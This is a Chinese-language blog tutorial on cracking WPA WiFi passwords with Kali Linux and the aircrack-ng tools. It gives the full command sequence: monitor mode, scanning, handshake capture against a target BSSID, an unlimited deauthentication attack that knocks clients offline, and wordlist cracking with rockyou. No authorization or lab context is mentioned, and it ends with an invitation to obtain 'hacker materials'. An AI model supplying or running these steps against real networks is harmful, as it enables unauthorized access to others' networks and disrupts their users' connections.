暴力破解WIFI密码
暴力破解WIFI密码
使用kali破解wifi密码,如果kali安装在虚拟机,需要一个外置usb网卡。
0x02 开始
查看插入的网卡
打开kali虚拟机,插入USB无线网卡,打开终端
iwconfig
查看无线网卡
airmon-ng
上面命令列出了支持监控模式的无线网卡。
如果没有任何输出,表示无线网卡不支持监控模式。
开启网卡监听模式,记录Interface名称,杀掉其他使用WiFi进程
airmon-ng start wlan0
如果有下图提示表示有其他网卡处于监控模式。
使用
airmon-ng check kill
结束其他使用WIFI进程
在执行
airmon-ng start wlan0
记住interface名称。
扫描信号
airodump-ng wlan0mon
PWR是信号强度,数字越小越好
Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
CH是对应路由器的所在信道
ESSID是对应路由器的名称
找到目标后,ctrl + c 中止
抓取握手包
airodump-ng -c 11 -w ./test --bssid 78:44:FD:83:0B:2C wlan0mon
airodump-ng -c AP的信道 -w 抓取握手包的存放位置名称 --bssid AP的MAC地址 你的的Interface名称
解除认证攻击
保持上一个terminal窗口的运行状态,打开一个新的terminal,进行解除认证攻击
强制连接到wifi的设备重新连接路由器,掉线设备重连后,
如图所示位置显示WPA handshake --即成功抓取到握手包。
两个terminal使用ctrl+c终止攻击和握手抓包。
aireplay-ng -0 0 -a 9C:A6:15:D0:04:C9 -c D8:32:E3:A7:B9:6F wlan0mon
aireplay-ng -攻击模式,我们这里使用 解除认证攻击(数字0) [攻击次数,0为无限攻击] -a AP端的MAC地址 -c 客户端端的MAC地址 interface名称
关闭无线网卡的监听模式
airmon-ng stop wlan0mon
使用字典暴力破解
kali下自带一份无线密码字典 –/usr/share/wordlists/rockyou.txt.gz
解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz
aircrack-ng-w/usr/share/wordlists/rockyou.txt-bBC:46:99:3D:66:D6 tplink-01.cap
#-w指定 密码字典 -b指定路由器的MAC地址
爆破成功后,如图区域位置显示KEY FOUND!字样,中括里为AP端的密码。
over!
转自:
进内部交流群,领黑客资料,可私信我
以上就是(暴力破解WIFI密码)全部内容,收藏起来下次访问不迷路!